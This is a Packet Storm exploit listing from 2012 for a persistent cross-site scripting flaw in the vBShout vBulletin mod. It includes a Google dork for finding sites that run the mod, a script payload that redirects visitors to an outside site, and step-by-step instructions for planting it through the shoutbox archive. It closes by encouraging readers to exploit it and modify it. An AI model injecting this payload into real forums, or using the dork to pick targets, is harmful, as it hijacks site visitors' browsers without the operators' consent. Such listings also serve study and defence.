vBShout Cross Site Scripting

2012-03-23T00:00:00
ID PACKETSTORM:111108
Type packetstorm
Reporter ToiL
Modified 2012-03-23T00:00:00

Description

                                        
                                            `# Exploit Title: vBShout persistent XSS 0day  
# Google Dork: "DragonByte Technologies Ltd" vbshout  
# Date: 21/3/2012 9:00 PM #EST  
# Author: ToiL  
# Software Link: http://www.dragonbyte-tech.com/  
# Version: all  
# Tested on: all  
# CVE : XSS  
#Greeting from Team Odyessy.  
#Today we will release a 0day for the vBulletin mod, vBShout.  
#This 0day exploit is brought to you by www.Bugabuse.net/  
#Have fun, And happy exploiting.  
######Guide########  
Enter  
<script>top.location='https://www.bugabuse.net/';</script>  
into the shoutbox  
go into the archive.  
Vioala. Persistent XSS exploit.  
Modify to your liking.  
  
`